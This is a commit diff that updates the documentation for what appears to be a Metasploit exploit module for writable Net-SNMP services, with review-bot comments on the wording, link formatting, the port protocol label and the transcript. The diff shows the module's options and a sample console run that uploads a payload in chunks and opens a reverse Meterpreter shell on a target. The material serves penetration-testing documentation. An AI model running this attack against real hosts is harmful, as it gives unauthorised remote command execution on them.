Documentation update

Steve
2018-02-14 16:58:14 +00:00
parent 734a6496c5
commit 5f6ecd2ff9
@@ -15,13 +15,24 @@
8. You should get a session
## Options
This module accepts 'RHOST' and 'RPORT' to specify target address and port respectively.
'FILEPATH' specifies where to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.
'COMMUNITY' is a read/write community string of the target Net-SNMP service.
'VERSION' selects the SNMP protocol version. Accepted values are '1' or '2c'.
'CHUNKSIZE' is the maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.
'TIMEOUT' specifies the maximum time to allow SNMP to timeout.
**FILEPATH**
The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.
**COMMUNITY**
The read/write community string of the target Net-SNMP service.
**VERSION**
The SNMP protocol version. Accepted values are '1' or '2c'.
**CHUNKSIZE**
The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments.
Note that cmdstager payloads are modified to allow further escaping, so the values limits may change between cmdstager flavors.
Possibly related to: [https://sourceforge.net/p/net-snmp/bugs/2542/]
**TIMEOUT**
Specifies the maximum time to allow SNMP to timeout.
## Scenario
```
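Review bot: the rewritten Options section drops the sentence that documented RHOST and RPORT and still does not describe RETRIES, which appears in the `show options` table in the next hunk; add **RHOST**, **RPORT** and **RETRIES** entries in the same bold-header style so every option a user sees is explained. Smaller points in the same hunk: `[https://sourceforge.net/p/net-snmp/bugs/2542/]` will not render as a link in Markdown (use `<https://sourceforge.net/p/net-snmp/bugs/2542/>` or `[net-snmp bug 2542](https://sourceforge.net/p/net-snmp/bugs/2542/)`), "the values limits may change" should read "the value's limits may change", and the TIMEOUT entry ("the maximum time to allow SNMP to timeout") should say what is being waited for and in which unit, for example how long to wait for an SNMP response before giving up on the request.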
@@ -63,9 +74,15 @@
FILEPATH /tmp yes file path to write to
RETRIES 1 yes SNMP Retries
RHOST 192.168.1.3 yes The target address
RPORT 161 yes The target port (UDP)
RPORT 161 yes The target port (TCP)
SHELL /bin/bash yes Shell to call with -c argument
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TIMEOUT 1 yes SNMP Timeout
VERSION 2c yes SNMP Version <1/2c>
URIPATH no The URI to use for this exploit (default is random)
VERSION 2c yes SNMP Version <1/2c>
Payload information:
Space: 4096
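Review bot: the RPORT description changes from "The target port (UDP)" to "The target port (TCP)", but SNMP on port 161 is carried over UDP, so the new wording is misleading for readers of the doc. If the line is a verbatim paste of `show options`, add a short note beside the table that the framework's generic RPORT label says TCP while the transport actually used is UDP; otherwise keep the UDP wording. Moving VERSION below URIPATH keeps the table alphabetical, which is fine.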
@@ -79,16 +96,25 @@
https://www.intelisecure.com
msf exploit(linux/snmp/net_snmpd_rw_access) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Writing to NET-SNMP-EXTEND-MIB with given payload
[*] Payload generated. Sending in 200 byte chunk increments.
[*] Sent chunked executable. Now executing payload
[*] Sending stage (849108 bytes) to 192.168.1.3
[+] SNMP request timeout (this is promising).
[*] Command Stager progress - 1.11% done (199/17924 bytes)
[*] Command Stager progress - 2.23% done (399/17924 bytes)
[*] Command Stager progress - 3.34% done (598/17924 bytes)
[*] Command Stager progress - 4.45% done (797/17924 bytes)
... Redacted ...
[*] Command Stager progress - 98.64% done (17681/17924 bytes)
[*] Command Stager progress - 99.72% done (17873/17924 bytes)
[*] Sending stage (857352 bytes) to 192.168.1.3
[*] Meterpreter session 30 opened (192.168.1.2:4444 -> 192.168.1.3:54230) at 2018-02-14 16:52:49 +0000
[-] Exploit failed: SNMP::RequestTimeout host 192.168.1.3 not responding
[*] Exploit completed, but no session was created.
msf exploit(linux/snmp/net_snmpd_rw_access) > sessions -i 30
[*] Starting interaction with 30...
meterpreter > getuid
Server username: uid=121, gid=129, euid=121, egid=129
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.3 - Meterpreter session 1 closed. Reason: User exit
[*] 192.168.1.3 - Meterpreter session 30 closed. Reason: User exit
```
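Review bot: the new transcript reads as contradictory on its face: "Meterpreter session 30 opened" is immediately followed by "[-] Exploit failed: SNMP::RequestTimeout host 192.168.1.3 not responding" and "[*] Exploit completed, but no session was created.", yet the very next lines interact with session 30 successfully. The removed line "[+] SNMP request timeout (this is promising)." at least told the reader the timeout was expected; add a sentence after the closing fence stating that the SNMP timeout reported after the session opens is expected and that the session remains usable, so a reader does not take the run for a failure.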